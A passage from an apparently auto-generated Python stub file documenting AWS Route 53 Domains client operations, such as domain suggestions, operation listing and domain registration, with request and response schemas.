'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'RegistrantContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'TechContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'AdminPrivacy': True|False,
'RegistrantPrivacy': True|False,
'TechPrivacy': True|False,
'RegistrarName': 'string',
'WhoIsServer': 'string',
'RegistrarUrl': 'string',
'AbuseContactEmail': 'string',
'AbuseContactPhone': 'string',
'RegistryDomainId': 'string',
'CreationDate': datetime(2015, 1, 1),
'UpdatedDate': datetime(2015, 1, 1),
'ExpirationDate': datetime(2015, 1, 1),
'Reseller': 'string',
'DnsSec': 'string',
'StatusList': [
'string',
]
}
:returns:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
"""
pass
def get_domain_suggestions(DomainName=None, SuggestionCount=None, OnlyAvailable=None):
"""
The GetDomainSuggestions operation returns a list of suggested domain names.
See also: AWS API Documentation
Exceptions
:example: response = client.get_domain_suggestions(
DomainName='string',
SuggestionCount=123,
OnlyAvailable=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nA domain name that you want to use as the basis for a list of possible domain names. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 .\n
:type SuggestionCount: integer
:param SuggestionCount: [REQUIRED]\nThe number of suggested domain names that you want Route 53 to return. Specify a value between 1 and 50.\n
:type OnlyAvailable: boolean
:param OnlyAvailable: [REQUIRED]\nIf OnlyAvailable is true , Route 53 returns only domain names that are available. If OnlyAvailable is false , Route 53 returns domain names without checking whether they\'re available to be registered. To determine whether the domain is available, you can call checkDomainAvailability for each suggestion.\n
:rtype: dict
ReturnsResponse Syntax
{
'SuggestionsList': [
{
'DomainName': 'string',
'Availability': 'string'
},
]
}
Response Structure
(dict) --
SuggestionsList (list) --
A list of possible domain names. If you specified true for OnlyAvailable in the request, the list contains only domains that are available for registration.
(dict) --
Information about one suggested domain name.
DomainName (string) --
A suggested domain name.
Availability (string) --
Whether the domain name is available for registering.
Note
You can register only the domains that are designated as AVAILABLE .
Valid values:
AVAILABLE
The domain name is available.
AVAILABLE_RESERVED
The domain name is reserved under specific conditions.
AVAILABLE_PREORDER
The domain name is available and can be preordered.
DONT_KNOW
The TLD registry didn\'t reply with a definitive answer about whether the domain name is available. Route 53 can return this response for a variety of reasons, for example, the registry is performing maintenance. Try again later.
PENDING
The TLD registry didn\'t return a response in the expected amount of time. When the response is delayed, it usually takes just a few extra seconds. You can resubmit the request immediately.
RESERVED
The domain name has been reserved for another person or organization.
UNAVAILABLE
The domain name is not available.
UNAVAILABLE_PREMIUM
The domain name is not available.
UNAVAILABLE_RESTRICTED
The domain name is forbidden.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'SuggestionsList': [
{
'DomainName': 'string',
'Availability': 'string'
},
]
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def get_operation_detail(OperationId=None):
"""
This operation returns the current status of an operation that is not completed.
See also: AWS API Documentation
Exceptions
:example: response = client.get_operation_detail(
OperationId='string'
)
:type OperationId: string
:param OperationId: [REQUIRED]\nThe identifier for the operation for which you want to get the status. Route 53 returned the identifier in the response to the original request.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Message': 'string',
'DomainName': 'string',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --The GetOperationDetail response includes the following elements.
OperationId (string) --The identifier for the operation.
Status (string) --The current status of the requested operation in the system.
Message (string) --Detailed information on the status including possible errors.
DomainName (string) --The name of a domain.
Type (string) --The type of operation that was requested.
SubmittedDate (datetime) --The date when the request was submitted.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Message': 'string',
'DomainName': 'string',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_domains(Marker=None, MaxItems=None):
"""
This operation returns all the domain names registered with Amazon Route 53 for the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_domains(
Marker='string',
MaxItems=123
)
:type Marker: string
:param Marker: For an initial request for a list of domains, omit this element. If the number of domains that are associated with the current AWS account is greater than the value that you specified for MaxItems , you can use Marker to return additional domains. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.\nConstraints: The marker must match the value specified in the previous request.\n
:type MaxItems: integer
:param MaxItems: Number of domains to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'Domains': [
{
'DomainName': 'string',
'AutoRenew': True|False,
'TransferLock': True|False,
'Expiry': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
Response Structure
(dict) --
The ListDomains response includes the following elements.
Domains (list) --
A summary of domains.
(dict) --
Summary information about one domain.
DomainName (string) --
The name of the domain that the summary information applies to.
AutoRenew (boolean) --
Indicates whether the domain is automatically renewed upon expiration.
TransferLock (boolean) --
Indicates whether a domain is locked from unauthorized transfer to another party.
Expiry (datetime) --
Expiration date of the domain in Unix time format and Coordinated Universal Time (UTC).
NextPageMarker (string) --
If there are more domains than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'Domains': [
{
'DomainName': 'string',
'AutoRenew': True|False,
'TransferLock': True|False,
'Expiry': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
"""
pass
def list_operations(SubmittedSince=None, Marker=None, MaxItems=None):
"""
Returns information about all of the operations that return an operation ID and that have ever been performed on domains that were registered by the current account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_operations(
SubmittedSince=datetime(2015, 1, 1),
Marker='string',
MaxItems=123
)
:type SubmittedSince: datetime
:param SubmittedSince: An optional parameter that lets you get information about all the operations that you submitted after a specified date and time. Specify the date and time in Unix time format and Coordinated Universal time (UTC).
:type Marker: string
:param Marker: For an initial request for a list of operations, omit this element. If the number of operations that are not yet complete is greater than the value that you specified for MaxItems , you can use Marker to return additional operations. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.
:type MaxItems: integer
:param MaxItems: Number of domains to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'Operations': [
{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
Response Structure
(dict) --
The ListOperations response includes the following elements.
Operations (list) --
Lists summaries of the operations.
(dict) --
OperationSummary includes the following elements.
OperationId (string) --
Identifier returned to track the requested action.
Status (string) --
The current status of the requested operation in the system.
Type (string) --
Type of the action requested.
SubmittedDate (datetime) --
The date when the request was submitted.
NextPageMarker (string) --
If there are more operations than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'Operations': [
{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
"""
pass
def list_tags_for_domain(DomainName=None):
"""
This operation returns all of the tags that are associated with the specified domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_domain(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to get a list of tags.\n
:rtype: dict
ReturnsResponse Syntax{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --The ListTagsForDomain response includes the following elements.
TagList (list) --A list of the tags that are associated with the specified domain.
(dict) --Each tag includes the following elements.
Key (string) --The key (name) of a tag.
Valid values: A-Z, a-z, 0-9, space, ".:/=+-@"
Constraints: Each key can be 1-128 characters long.
Value (string) --The value of a tag.
Valid values: A-Z, a-z, 0-9, space, ".:/=+-@"
Constraints: Each value can be 0-256 characters long.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
"""
pass
def register_domain(DomainName=None, IdnLangCode=None, DurationInYears=None, AutoRenew=None, AdminContact=None, RegistrantContact=None, TechContact=None, PrivacyProtectAdminContact=None, PrivacyProtectRegistrantContact=None, PrivacyProtectTechContact=None):
"""
This operation registers a domain. Domains are registered either by Amazon Registrar (for .com, .net, and .org domains) or by our registrar associate, Gandi (for all other domains). For some top-level domains (TLDs), this operation requires extra parameters.
When you register a domain, Amazon Route 53 does the following:
See also: AWS API Documentation
Exceptions
:example: response = client.register_domain(
DomainName='string',
IdnLangCode='string',
DurationInYears=123,
AutoRenew=True|False,
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'T